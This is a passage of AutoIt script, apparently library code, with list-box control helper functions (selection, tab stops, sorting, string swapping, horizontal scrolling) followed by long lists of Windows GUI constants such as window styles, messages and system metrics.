		Return _sendmessage($hwnd, $lb_setcaretindex, $iindex, $fpartial) = 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_setcaretindex, $iindex, $fpartial) = 0
	EndIf
EndFunc

Func _guictrllistbox_setcolumnwidth($hwnd, $iwidth)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		_sendmessage($hwnd, $lb_setcolumnwidth, $iwidth)
	Else
		GUICtrlSendMsg($hwnd, $lb_setcolumnwidth, $iwidth, 0)
	EndIf
EndFunc

Func _guictrllistbox_setcursel($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_setcursel, $iindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_setcursel, $iindex, 0)
	EndIf
EndFunc

Func _guictrllistbox_sethorizontalextent($hwnd, $iwidth)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		_sendmessage($hwnd, $lb_sethorizontalextent, $iwidth)
	Else
		GUICtrlSendMsg($hwnd, $lb_sethorizontalextent, $iwidth, 0)
	EndIf
EndFunc

Func _guictrllistbox_setitemdata($hwnd, $iindex, $ivalue)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_setitemdata, $iindex, $ivalue) <> -1
	Else
		Return GUICtrlSendMsg($hwnd, $lb_setitemdata, $iindex, $ivalue) <> -1
	EndIf
EndFunc

Func _guictrllistbox_setitemheight($hwnd, $iheight, $iindex = 0)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $iret
	If IsHWnd($hwnd) Then
		$iret = _sendmessage($hwnd, $lb_setitemheight, $iindex, $iheight)
		_winapi_invalidaterect($hwnd)
	Else
		$iret = GUICtrlSendMsg($hwnd, $lb_setitemheight, $iindex, $iheight)
		_winapi_invalidaterect(GUICtrlGetHandle($hwnd))
	EndIf
	Return $iret <> -1
EndFunc

Func _guictrllistbox_setlocale($hwnd, $ilocal)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_setlocale, $ilocal)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_setlocale, $ilocal, 0)
	EndIf
EndFunc

Func _guictrllistbox_setsel($hwnd, $iindex = -1, $fselect = -1)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $i_ret = True
	If IsHWnd($hwnd) Then
		If $iindex == -1 Then
			For $iindex = 0 To _guictrllistbox_getcount($hwnd) - 1
				$i_ret = _guictrllistbox_getsel($hwnd, $iindex)
				If ($i_ret == $lb_err) Then Return SetError($lb_err, $lb_err, False)
				If ($i_ret > 0) Then
					$i_ret = _sendmessage($hwnd, $lb_setsel, False, $iindex) <> -1
				Else
					$i_ret = _sendmessage($hwnd, $lb_setsel, True, $iindex) <> -1
				EndIf
				If ($i_ret == False) Then Return SetError($lb_err, $lb_err, False)
			Next
		ElseIf $fselect == -1 Then
			If _guictrllistbox_getsel($hwnd, $iindex) Then
				Return _sendmessage($hwnd, $lb_setsel, False, $iindex) <> -1
			Else
				Return _sendmessage($hwnd, $lb_setsel, True, $iindex) <> -1
			EndIf
		Else
			Return _sendmessage($hwnd, $lb_setsel, $fselect, $iindex) <> -1
		EndIf
	Else
		If $iindex == -1 Then
			For $iindex = 0 To _guictrllistbox_getcount($hwnd) - 1
				$i_ret = _guictrllistbox_getsel($hwnd, $iindex)
				If ($i_ret == $lb_err) Then Return SetError($lb_err, $lb_err, False)
				If ($i_ret > 0) Then
					$i_ret = GUICtrlSendMsg($hwnd, $lb_setsel, False, $iindex) <> -1
				Else
					$i_ret = GUICtrlSendMsg($hwnd, $lb_setsel, True, $iindex) <> -1
				EndIf
				If ($i_ret == False) Then Return SetError($lb_err, $lb_err, False)
			Next
		ElseIf $fselect == -1 Then
			If _guictrllistbox_getsel($hwnd, $iindex) Then
				Return GUICtrlSendMsg($hwnd, $lb_setsel, False, $iindex) <> -1
			Else
				Return GUICtrlSendMsg($hwnd, $lb_setsel, True, $iindex) <> -1
			EndIf
		Else
			Return GUICtrlSendMsg($hwnd, $lb_setsel, $fselect, $iindex) <> -1
		EndIf
	EndIf
	Return $i_ret
EndFunc

Func _guictrllistbox_settabstops($hwnd, $atabstops)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $icount = $atabstops[0]
	Local $ttabstops = DllStructCreate("int[" & $icount & "]")
	For $ii = 1 To $icount
		DllStructSetData($ttabstops, 1, $atabstops[$ii], $ii)
	Next
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_settabstops, $icount, $ttabstops, 0, "wparam", "struct*") = 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_settabstops, $icount, DllStructGetPtr($ttabstops)) = 0
	EndIf
EndFunc

Func _guictrllistbox_settopindex($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_settopindex, $iindex) <> -1
	Else
		Return GUICtrlSendMsg($hwnd, $lb_settopindex, $iindex, 0) <> -1
	EndIf
EndFunc

Func _guictrllistbox_sort($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $bak = _guictrllistbox_gettext($hwnd, 0)
	If ($bak == -1) Then Return SetError($lb_err, $lb_err, False)
	If (_guictrllistbox_deletestring($hwnd, 0) == -1) Then Return SetError($lb_err, $lb_err, False)
	Return _guictrllistbox_addstring($hwnd, $bak) <> -1
EndFunc

Func _guictrllistbox_swapstring($hwnd, $iindexa, $iindexb)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $itema = _guictrllistbox_gettext($hwnd, $iindexa)
	Local $itemb = _guictrllistbox_gettext($hwnd, $iindexb)
	If (_guictrllistbox_deletestring($hwnd, $iindexa) == -1) Then Return SetError($lb_err, $lb_err, False)
	If (_guictrllistbox_insertstring($hwnd, $itemb, $iindexa) == -1) Then Return SetError($lb_err, $lb_err, False)
	If (_guictrllistbox_deletestring($hwnd, $iindexb) == -1) Then Return SetError($lb_err, $lb_err, False)
	If (_guictrllistbox_insertstring($hwnd, $itema, $iindexb) == -1) Then Return SetError($lb_err, $lb_err, False)
	Return True
EndFunc

Func _guictrllistbox_updatehscroll($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $hdc, $hfont, $tsize, $stext
	Local $imax = 0
	If IsHWnd($hwnd) Then
		$hfont = _sendmessage($hwnd, $__listboxconstant_wm_getfont)
		$hdc = _winapi_getdc($hwnd)
		_winapi_selectobject($hdc, $hfont)
		For $ii = 0 To _guictrllistbox_getcount($hwnd) - 1
			$stext = _guictrllistbox_gettext($hwnd, $ii)
			$tsize = _winapi_gettextextentpoint32($hdc, $stext & "W")
			If DllStructGetData($tsize, "X") > $imax Then
				$imax = DllStructGetData($tsize, "X")
			EndIf
		Next
		_guictrllistbox_sethorizontalextent($hwnd, $imax)
		_winapi_selectobject($hdc, $hfont)
		_winapi_releasedc($hwnd, $hdc)
	Else
		$hfont = GUICtrlSendMsg($hwnd, $__listboxconstant_wm_getfont, 0, 0)
		Local $t_hwnd = GUICtrlGetHandle($hwnd)
		$hdc = _winapi_getdc($t_hwnd)
		_winapi_selectobject($hdc, $hfont)
		For $ii = 0 To _guictrllistbox_getcount($hwnd) - 1
			$stext = _guictrllistbox_gettext($hwnd, $ii)
			$tsize = _winapi_gettextextentpoint32($hdc, $stext & "W")
			If DllStructGetData($tsize, "X") > $imax Then
				$imax = DllStructGetData($tsize, "X")
			EndIf
		Next
		_guictrllistbox_sethorizontalextent($hwnd, $imax)
		_winapi_selectobject($hdc, $hfont)
		_winapi_releasedc($t_hwnd, $hdc)
	EndIf
EndFunc

Global Const $es_left = 0
Global Const $es_center = 1
Global Const $es_right = 2
Global Const $es_multiline = 4
Global Const $es_uppercase = 8
Global Const $es_lowercase = 16
Global Const $es_password = 32
Global Const $es_autovscroll = 64
Global Const $es_autohscroll = 128
Global Const $es_nohidesel = 256
Global Const $es_oemconvert = 1024
Global Const $es_readonly = 2048
Global Const $es_wantreturn = 4096
Global Const $es_number = 8192
Global Const $ec_err = -1
Global Const $ecm_first = 5376
Global Const $em_canundo = 198
Global Const $em_charfrompos = 215
Global Const $em_emptyundobuffer = 205
Global Const $em_fmtlines = 200
Global Const $em_getcuebanner = ($ecm_first + 2)
Global Const $em_getfirstvisibleline = 206
Global Const $em_gethandle = 189
Global Const $em_getimestatus = 217
Global Const $em_getlimittext = 213
Global Const $em_getline = 196
Global Const $em_getlinecount = 186
Global Const $em_getmargins = 212
Global Const $em_getmodify = 184
Global Const $em_getpasswordchar = 210
Global Const $em_getrect = 178
Global Const $em_getsel = 176
Global Const $em_getthumb = 190
Global Const $em_getwordbreakproc = 209
Global Const $em_hideballoontip = ($ecm_first + 4)
Global Const $em_limittext = 197
Global Const $em_linefromchar = 201
Global Const $em_lineindex = 187
Global Const $em_linelength = 193
Global Const $em_linescroll = 182
Global Const $em_posfromchar = 214
Global Const $em_replacesel = 194
Global Const $em_scroll = 181
Global Const $em_scrollcaret = 183
Global Const $em_setcuebanner = ($ecm_first + 1)
Global Const $em_sethandle = 188
Global Const $em_setimestatus = 216
Global Const $em_setlimittext = $em_limittext
Global Const $em_setmargins = 211
Global Const $em_setmodify = 185
Global Const $em_setpasswordchar = 204
Global Const $em_setreadonly = 207
Global Const $em_setrect = 179
Global Const $em_setrectnp = 180
Global Const $em_setsel = 177
Global Const $em_settabstops = 203
Global Const $em_setwordbreakproc = 208
Global Const $em_showballoontip = ($ecm_first + 3)
Global Const $em_undo = 199
Global Const $ec_leftmargin = 1
Global Const $ec_rightmargin = 2
Global Const $ec_usefontinfo = 65535
Global Const $emsis_compositionstring = 1
Global Const $eimes_getcompstratonce = 1
Global Const $eimes_cancelcompstrinfocus = 2
Global Const $eimes_completecompstrkillfocus = 4
Global Const $en_align_ltr_ec = 1792
Global Const $en_align_rtl_ec = 1793
Global Const $en_change = 768
Global Const $en_errspace = 1280
Global Const $en_hscroll = 1537
Global Const $en_killfocus = 512
Global Const $en_maxtext = 1281
Global Const $en_setfocus = 256
Global Const $en_update = 1024
Global Const $en_vscroll = 1538
Global Const $tti_none = 0
Global Const $tti_info = 1
Global Const $tti_warning = 2
Global Const $tti_error = 3
Global Const $tti_info_large = 4
Global Const $tti_warning_large = 5
Global Const $tti_error_large = 6
Global Const $__editconstant_ws_vscroll = 2097152
Global Const $__editconstant_ws_hscroll = 1048576
Global Const $gui_ss_default_edit = BitOR($es_wantreturn, $__editconstant_ws_vscroll, $__editconstant_ws_hscroll, $es_autovscroll, $es_autohscroll)
Global Const $gui_ss_default_input = BitOR($es_left, $es_autohscroll)
Global Const $ws_tiled = 0
Global Const $ws_overlapped = 0
Global Const $ws_maximizebox = 65536
Global Const $ws_minimizebox = 131072
Global Const $ws_tabstop = 65536
Global Const $ws_group = 131072
Global Const $ws_sizebox = 262144
Global Const $ws_thickframe = 262144
Global Const $ws_sysmenu = 524288
Global Const $ws_hscroll = 1048576
Global Const $ws_vscroll = 2097152
Global Const $ws_dlgframe = 4194304
Global Const $ws_border = 8388608
Global Const $ws_caption = 12582912
Global Const $ws_overlappedwindow = 13565952
Global Const $ws_tiledwindow = 13565952
Global Const $ws_maximize = 16777216
Global Const $ws_clipchildren = 33554432
Global Const $ws_clipsiblings = 67108864
Global Const $ws_disabled = 134217728
Global Const $ws_visible = 268435456
Global Const $ws_minimize = 536870912
Global Const $ws_child = 1073741824
Global Const $ws_popup = -2147483648
Global Const $ws_popupwindow = -2138570752
Global Const $ds_modalframe = 128
Global Const $ds_setforeground = 512
Global Const $ds_contexthelp = 8192
Global Const $ws_ex_acceptfiles = 16
Global Const $ws_ex_mdichild = 64
Global Const $ws_ex_appwindow = 262144
Global Const $ws_ex_composited = 33554432
Global Const $ws_ex_clientedge = 512
Global Const $ws_ex_contexthelp = 1024
Global Const $ws_ex_dlgmodalframe = 1
Global Const $ws_ex_leftscrollbar = 16384
Global Const $ws_ex_overlappedwindow = 768
Global Const $ws_ex_right = 4096
Global Const $ws_ex_staticedge = 131072
Global Const $ws_ex_toolwindow = 128
Global Const $ws_ex_topmost = 8
Global Const $ws_ex_transparent = 32
Global Const $ws_ex_windowedge = 256
Global Const $ws_ex_layered = 524288
Global Const $ws_ex_controlparent = 65536
Global Const $ws_ex_layoutrtl = 4194304
Global Const $ws_ex_rtlreading = 8192
Global Const $wm_gettextlength = 14
Global Const $wm_gettext = 13
Global Const $wm_size = 5
Global Const $wm_sizing = 532
Global Const $wm_user = 1024
Global Const $wm_create = 1
Global Const $wm_destroy = 2
Global Const $wm_move = 3
Global Const $wm_activate = 6
Global Const $wm_setfocus = 7
Global Const $wm_killfocus = 8
Global Const $wm_enable = 10
Global Const $wm_setredraw = 11
Global Const $wm_settext = 12
Global Const $wm_paint = 15
Global Const $wm_close = 16
Global Const $wm_queryendsession = 17
Global Const $wm_quit = 18
Global Const $wm_erasebkgnd = 20
Global Const $wm_queryopen = 19
Global Const $wm_syscolorchange = 21
Global Const $wm_endsession = 22
Global Const $wm_showwindow = 24
Global Const $wm_settingchange = 26
Global Const $wm_wininichange = 26
Global Const $wm_devmodechange = 27
Global Const $wm_activateapp = 28
Global Const $wm_fontchange = 29
Global Const $wm_timechange = 30
Global Const $wm_cancelmode = 31
Global Const $wm_ime_startcomposition = 269
Global Const $wm_ime_endcomposition = 270
Global Const $wm_ime_composition = 271
Global Const $wm_ime_keylast = 271
Global Const $wm_setcursor = 32
Global Const $wm_mouseactivate = 33
Global Const $wm_childactivate = 34
Global Const $wm_queuesync = 35
Global Const $wm_getminmaxinfo = 36
Global Const $wm_painticon = 38
Global Const $wm_iconerasebkgnd = 39
Global Const $wm_nextdlgctl = 40
Global Const $wm_spoolerstatus = 42
Global Const $wm_drawitem = 43
Global Const $wm_measureitem = 44
Global Const $wm_deleteitem = 45
Global Const $wm_vkeytoitem = 46
Global Const $wm_chartoitem = 47
Global Const $wm_setfont = 48
Global Const $wm_getfont = 49
Global Const $wm_sethotkey = 50
Global Const $wm_gethotkey = 51
Global Const $wm_querydragicon = 55
Global Const $wm_compareitem = 57
Global Const $wm_getobject = 61
Global Const $wm_compacting = 65
Global Const $wm_commnotify = 68
Global Const $wm_windowposchanging = 70
Global Const $wm_windowposchanged = 71
Global Const $wm_power = 72
Global Const $wm_notify = 78
Global Const $wm_copydata = 74
Global Const $wm_canceljournal = 75
Global Const $wm_inputlangchangerequest = 80
Global Const $wm_inputlangchange = 81
Global Const $wm_tcard = 82
Global Const $wm_help = 83
Global Const $wm_userchanged = 84
Global Const $wm_notifyformat = 85
Global Const $wm_parentnotify = 528
Global Const $wm_entermenuloop = 529
Global Const $wm_exitmenuloop = 530
Global Const $wm_nextmenu = 531
Global Const $wm_capturechanged = 533
Global Const $wm_moving = 534
Global Const $wm_powerbroadcast = 536
Global Const $wm_devicechange = 537
Global Const $wm_mdicreate = 544
Global Const $wm_mdidestroy = 545
Global Const $wm_mdiactivate = 546
Global Const $wm_mdirestore = 547
Global Const $wm_mdinext = 548
Global Const $wm_mdimaximize = 549
Global Const $wm_mditile = 550
Global Const $wm_mdicascade = 551
Global Const $wm_mdiiconarrange = 552
Global Const $wm_mdigetactive = 553
Global Const $wm_mdisetmenu = 560
Global Const $wm_entersizemove = 561
Global Const $wm_exitsizemove = 562
Global Const $wm_dropfiles = 563
Global Const $wm_mdirefreshmenu = 564
Global Const $wm_ime_setcontext = 641
Global Const $wm_ime_notify = 642
Global Const $wm_ime_control = 643
Global Const $wm_ime_compositionfull = 644
Global Const $wm_ime_select = 645
Global Const $wm_ime_char = 646
Global Const $wm_ime_request = 648
Global Const $wm_ime_keydown = 656
Global Const $wm_ime_keyup = 657
Global Const $wm_ncmousehover = 672
Global Const $wm_mousehover = 673
Global Const $wm_ncmouseleave = 674
Global Const $wm_mouseleave = 675
Global Const $wm_wtssession_change = 689
Global Const $wm_tablet_first = 704
Global Const $wm_tablet_last = 735
Global Const $wm_cut = 768
Global Const $wm_copy = 769
Global Const $wm_paste = 770
Global Const $wm_clear = 771
Global Const $wm_undo = 772
Global Const $wm_paletteischanging = 784
Global Const $wm_hotkey = 786
Global Const $wm_palettechanged = 785
Global Const $wm_print = 791
Global Const $wm_printclient = 792
Global Const $wm_appcommand = 793
Global Const $wm_querynewpalette = 783
Global Const $wm_themechanged = 794
Global Const $wm_handheldfirst = 856
Global Const $wm_handheldlast = 863
Global Const $wm_afxfirst = 864
Global Const $wm_afxlast = 895
Global Const $wm_penwinfirst = 896
Global Const $wm_penwinlast = 911
Global Const $wm_contextmenu = 123
Global Const $wm_stylechanging = 124
Global Const $wm_stylechanged = 125
Global Const $wm_displaychange = 126
Global Const $wm_geticon = 127
Global Const $wm_seticon = 128
Global Const $wm_nccreate = 129
Global Const $wm_ncdestroy = 130
Global Const $wm_nccalcsize = 131
Global Const $wm_nchittest = 132
Global Const $wm_ncpaint = 133
Global Const $wm_ncactivate = 134
Global Const $wm_getdlgcode = 135
Global Const $wm_syncpaint = 136
Global Const $wm_ncmousemove = 160
Global Const $wm_nclbuttondown = 161
Global Const $wm_nclbuttonup = 162
Global Const $wm_nclbuttondblclk = 163
Global Const $wm_ncrbuttondown = 164
Global Const $wm_ncrbuttonup = 165
Global Const $wm_ncrbuttondblclk = 166
Global Const $wm_ncmbuttondown = 167
Global Const $wm_ncmbuttonup = 168
Global Const $wm_ncmbuttondblclk = 169
Global Const $wm_ncxbuttondown = 171
Global Const $wm_ncxbuttonup = 172
Global Const $wm_ncxbuttondblclk = 173
Global Const $wm_keydown = 256
Global Const $wm_keyfirst = 256
Global Const $wm_keyup = 257
Global Const $wm_char = 258
Global Const $wm_deadchar = 259
Global Const $wm_syskeydown = 260
Global Const $wm_syskeyup = 261
Global Const $wm_syschar = 262
Global Const $wm_sysdeadchar = 263
Global Const $wm_keylast = 265
Global Const $wm_unichar = 265
Global Const $wm_initdialog = 272
Global Const $wm_command = 273
Global Const $wm_syscommand = 274
Global Const $wm_timer = 275
Global Const $wm_hscroll = 276
Global Const $wm_vscroll = 277
Global Const $wm_initmenu = 278
Global Const $wm_initmenupopup = 279
Global Const $wm_menuselect = 287
Global Const $wm_menuchar = 288
Global Const $wm_enteridle = 289
Global Const $wm_menurbuttonup = 290
Global Const $wm_menudrag = 291
Global Const $wm_menugetobject = 292
Global Const $wm_uninitmenupopup = 293
Global Const $wm_menucommand = 294
Global Const $wm_changeuistate = 295
Global Const $wm_updateuistate = 296
Global Const $wm_queryuistate = 297
Global Const $wm_ctlcolormsgbox = 306
Global Const $wm_ctlcoloredit = 307
Global Const $wm_ctlcolorlistbox = 308
Global Const $wm_ctlcolorbtn = 309
Global Const $wm_ctlcolordlg = 310
Global Const $wm_ctlcolorscrollbar = 311
Global Const $wm_ctlcolorstatic = 312
Global Const $wm_ctlcolor = 25
Global Const $mn_gethmenu = 481
Global Const $wm_app = 32768
Global Const $nm_first = 0
Global Const $nm_outofmemory = $nm_first - 1
Global Const $nm_click = $nm_first - 2
Global Const $nm_dblclk = $nm_first - 3
Global Const $nm_return = $nm_first - 4
Global Const $nm_rclick = $nm_first - 5
Global Const $nm_rdblclk = $nm_first - 6
Global Const $nm_setfocus = $nm_first - 7
Global Const $nm_killfocus = $nm_first - 8
Global Const $nm_customdraw = $nm_first - 12
Global Const $nm_hover = $nm_first - 13
Global Const $nm_nchittest = $nm_first - 14
Global Const $nm_keydown = $nm_first - 15
Global Const $nm_releasedcapture = $nm_first - 16
Global Const $nm_setcursor = $nm_first - 17
Global Const $nm_char = $nm_first - 18
Global Const $nm_tooltipscreated = $nm_first - 19
Global Const $nm_ldown = $nm_first - 20
Global Const $nm_rdown = $nm_first - 21
Global Const $nm_themechanged = $nm_first - 22
Global Const $wm_mousefirst = 512
Global Const $wm_mousemove = 512
Global Const $wm_lbuttondown = 513
Global Const $wm_lbuttonup = 514
Global Const $wm_lbuttondblclk = 515
Global Const $wm_rbuttondown = 516
Global Const $wm_rbuttonup = 517
Global Const $wm_rbuttondblclk = 518
Global Const $wm_mbuttondown = 519
Global Const $wm_mbuttonup = 520
Global Const $wm_mbuttondblclk = 521
Global Const $wm_mousewheel = 522
Global Const $wm_xbuttondown = 523
Global Const $wm_xbuttonup = 524
Global Const $wm_xbuttondblclk = 525
Global Const $wm_mousehwheel = 526
Global Const $ps_solid = 0
Global Const $ps_dash = 1
Global Const $ps_dot = 2
Global Const $ps_dashdot = 3
Global Const $ps_dashdotdot = 4
Global Const $ps_null = 5
Global Const $ps_insideframe = 6
Global Const $lwa_alpha = 2
Global Const $lwa_colorkey = 1
Global Const $rgn_and = 1
Global Const $rgn_or = 2
Global Const $rgn_xor = 3
Global Const $rgn_diff = 4
Global Const $rgn_copy = 5
Global Const $errorregion = 0
Global Const $nullregion = 1
Global Const $simpleregion = 2
Global Const $complexregion = 3
Global Const $transparent = 1
Global Const $opaque = 2
Global Const $ccm_first = 8192
Global Const $ccm_getunicodeformat = ($ccm_first + 6)
Global Const $ccm_setunicodeformat = ($ccm_first + 5)
Global Const $ccm_setbkcolor = $ccm_first + 1
Global Const $ccm_setcolorscheme = $ccm_first + 2
Global Const $ccm_getcolorscheme = $ccm_first + 3
Global Const $ccm_getdroptarget = $ccm_first + 4
Global Const $ccm_setwindowtheme = $ccm_first + 11
Global Const $ga_parent = 1
Global Const $ga_root = 2
Global Const $ga_rootowner = 3
Global Const $sm_cxscreen = 0
Global Const $sm_cyscreen = 1
Global Const $sm_cxvscroll = 2
Global Const $sm_cyhscroll = 3
Global Const $sm_cycaption = 4
Global Const $sm_cxborder = 5
Global Const $sm_cyborder = 6
Global Const $sm_cxdlgframe = 7
Global Const $sm_cydlgframe = 8
Global Const $sm_cyvthumb = 9
Global Const $sm_cxhthumb = 10
Global Const $sm_cxicon = 11
Global Const $sm_cyicon = 12
Global Const $sm_cxcursor = 13
Global Const $sm_cycursor = 14
Global Const $sm_cymenu = 15
Global Const $sm_cxfullscreen = 16
Global Const $sm_cyfullscreen = 17
Global Const $sm_cykanjiwindow = 18
Global Const $sm_mousepresent = 19
Global Const $sm_cyvscroll = 20
Global Const $sm_cxhscroll = 21
Global Const $sm_debug = 22
Global Const $sm_swapbutton = 23
Global Const $sm_reserved1 = 24
Global Const $sm_reserved2 = 25
Global Const $sm_reserved3 = 26
Global Const $sm_reserved4 = 27
Global Const $sm_cxmin = 28
Global Const $sm_cymin = 29
Global Const $sm_cxsize = 30
Global Const $sm_cysize = 31
Global Const $sm_cxframe = 32
Global Const $sm_cyframe = 33
Global Const $sm_cxmintrack = 34
Global Const $sm_cymintrack = 35
Global Const $sm_cxdoubleclk = 36
Global Const $sm_cydoubleclk = 37
Global Const $sm_cxiconspacing = 38
Global Const $sm_cyiconspacing = 39
Global Const $sm_menudropalignment = 40
Global Const $sm_penwindows = 41
Global Const $sm_dbcsenabled = 42
Global Const $sm_cmousebuttons = 43
Global Const $sm_secure = 44
Global Const $sm_cxedge = 45
Global Const $sm_cyedge = 46
Global Const $sm_cxminspacing = 47
Global Const $sm_cyminspacing = 48
Global Const $sm_cxsmicon = 49
Global Const $sm_cysmicon = 50
Global Const $sm_cysmcaption = 51
Global Const $sm_cxsmsize = 52
Global Const $sm_cysmsize = 53
Global Const $sm_cxmenusize = 54
Global Const $sm_cymenusize = 55
Global Const $sm_arrange = 56
Global Const $sm_cxminimized = 57
Global Const $sm_cyminimized = 58
Global Const $sm_cxmaxtrack = 59
Global Const $sm_cymaxtrack = 60
Global Const $sm_cxmaximized = 61
Global Const $sm_cymaximized = 62
Global Const $sm_network = 63
Global Const $sm_cleanboot = 67
Global Const $sm_cxdrag = 68
Global Const $sm_cydrag = 69
Global Const $sm_showsounds = 70
Global Const $sm_cxmenucheck = 71
Global Const $sm_cymenucheck = 72
Global Const $sm_slowmachine = 73
Global Const $sm_mideastenabled = 74
Global Const $sm_mousewheelpresent = 75
Global Const $sm_xvirtualscreen = 76
Global Const $sm_yvirtualscreen = 77
Global Const $sm_cxvirtualscreen = 78
Global Const $sm_cyvirtualscreen = 79
Global Const $sm_cmonitors = 80
Global Const $sm_samedisplayformat = 81
Global Const $sm_immenabled = 82
Global Const $sm_cxfocusborder = 83
Global Const $sm_cyfocusborder = 84
Global Const $sm_tabletpc = 86
Global Const $sm_mediacenter = 87
Global Const $sm_starter = 88
Global Const $sm_serverr2 = 89
Global Const $sm_cmetrics = 90
Global Const $sm_remotesession = 4096
Global Const $sm_shuttingdown = 8192
Global Const $sm_remotecontrol = 8193
Global Const $sm_caretblinkingenabled = 8194
Global Const $blackness = 66
Global Const $captureblt = 1073741824
Global Const $dstinvert = 5570569
Global Const $mergecopy = 12583114
Global Const $mergepaint = 12255782
Global Const $nomirrorbitmap = -2147483648
Global Const $notsrccopy = 3342344
Global Const $notsrcerase = 1114278
Global Const $patcopy = 15728673
Global Const $patinvert = 5898313
Global Const $patpaint = 16452105
Global Const $srcand = 8913094
Global Const $srccopy = 13369376
Global Const $srcerase = 4457256
Global Const $srcinvert = 6684742
Global Const $srcpaint = 15597702
Global Const $whiteness = 16711778
Global Const $dt_bottom = 8
Global Const $dt_calcrect = 1024
Global Const $dt_center = 1
Global Const $dt_editcontrol = 8192
Global Const $dt_end_ellipsis = 32768
Global Const $dt_expandtabs = 64
Global Const $dt_externalleading = 512
Global Const $dt_hideprefix = 1048576
Global Const $dt_internal = 4096
Global Const $dt_left = 0
Global Const $dt_modifystring = 65536
Global Const $dt_noclip = 256
Global Const $dt_nofullwidthcharbreak = 524288
Global Const $dt_noprefix = 2048
Global Const $dt_path_ellipsis = 16384
Global Const $dt_prefixonly = 2097152
Global Const $dt_right = 2
Global Const $dt_rtlreading = 131072
Global Const $dt_singleline = 32
Global Const $dt_tabstop = 128
Global Const $dt_top = 0
Global Const $dt_vcenter = 4
Global Const $dt_wordbreak = 16
Global Const $dt_word_ellipsis = 262144
Global Const $rdw_erase = 4
Global Const $rdw_frame = 1024
Global Const $rdw_internalpaint = 2
Global Const $rdw_invalidate = 1
Global Const $rdw_noerase = 32
Global Const $rdw_noframe = 2048
Global Const $rdw_nointernalpaint = 16
Global Const $rdw_validate = 8
Global Const $rdw_erasenow = 512
Global Const $rdw_updatenow = 256
Global Const $rdw_allchildren = 128
Global Const $rdw_nochildren = 64
Global Const $wm_renderformat = 773
Global Const $wm_renderallformats = 774
Global Const $wm_destroyclipboard = 775
Global Const $wm_drawclipboard = 776
Global Const $wm_paintclipboard = 777
Global Const $wm_vscrollclipboard = 778
Global Const $wm_sizeclipboard = 779
Global Const $wm_askcbformatname = 780
Global Const $wm_changecbchain = 781
Global Const $wm_hscrollclipboard = 782
Global Const $hterror = -2
Global Const $httransparent = -1
Global Const $htnowhere = 0
Global Const $htclient = 1
Global Const $htcaption = 2
Global Const $htsysmenu = 3
Global Const $htgrowbox = 4
Global Const $htsize = $htgrowbox
Global Const $htmenu = 5
Global Const $hthscroll = 6
Global Const $htvscroll = 7
Global Const $htminbutton = 8
Global Const $htmaxbutton = 9
Global Const $htleft = 10
Global Const $htright = 11
Global Const $httop = 12
Global Const $httopleft = 13
Global Const $httopright = 14
Global Const $htbottom = 15
Global Const $htbottomleft = 16
Global Const $htbottomright = 17
Global Const $htborder = 18
Global Const $htreduce = $htminbutton
Global Const $htzoom = $htmaxbutton
Global Const $htsizefirst = $htleft
Global Const $htsizelast = $htbottomright
Global Const $htobject = 19
Global Const $htclose = 20
Global Const $hthelp = 21
Global Const $color_scrollbar = 0
Global Const $color_background = 1
Global Const $color_activecaption = 2
Global Const $color_inactivecaption = 3
Global Const $color_menu = 4
Global Const $color_window = 5
Global Const $color_windowframe = 6
Global Const $color_menutext = 7
Global Const $color_windowtext = 8
Global Const $color_captiontext = 9
Global Const $color_activeborder = 10
Global Const $color_inactiveborder = 11
Global Const $color_appworkspace = 12
Global Const $color_highlight = 13
Global Const $color_highlighttext = 14
Global Const $color_btnface = 15
Global Const $color_btnshadow = 16
Global Const $color_graytext = 17
Global Const $color_btntext = 18
Global Const $color_inactivecaptiontext = 19
Global Const $color_btnhighlight = 20
Global Const $color_3ddkshadow = 21
Global Const $color_3dlight = 22
Global Const $color_infotext = 23
Global Const $color_infobk = 24
Global Const $color_hotlight = 26
Global Const $color_gradientactivecaption = 27
Global Const $color_gradientinactivecaption = 28
Global Const $color_menuhilight = 29
Global Const $color_menubar = 30
Global Const $color_desktop = 1
Global Const $color_3dface = 15
Global Const $color_3dshadow = 16
Global Const $color_3dhighlight = 20
Global Const $color_3dhilight = 20
Global Const $color_btnhilight = 20
Global Const $hinst_commctrl = -1
Global Const $idb_std_small_color = 0
Global Const $idb_std_large_color = 1
Global Const $idb_view_small_color = 4
Global Const $idb_view_large_color = 5
Global Const $idb_hist_small_color = 8
Global Const $idb_hist_large_color = 9
Global Const $startf_forceofffeedback = 128
Global Const $startf_forceonfeedback = 64
Global Const $startf_runfullscreen = 32
Global Const $startf_usecountchars = 8
Global Const $startf_usefillattribute = 16
Global Const $startf_usehotkey = 512
Global Const $startf_useposition = 4
Global Const $startf_useshowwindow = 1
Global Const $startf_usesize = 2
Global Const $startf_usestdhandles = 256
Global Const $cdds_prepaint = 1
Global Const $cdds_postpaint = 2
Global Const $cdds_preerase = 3
Global Const $cdds_posterase = 4
Global Const $cdds_item = 65536
Global Const $cdds_itemprepaint = 65537
Global Const $cdds_itempostpaint = 65538
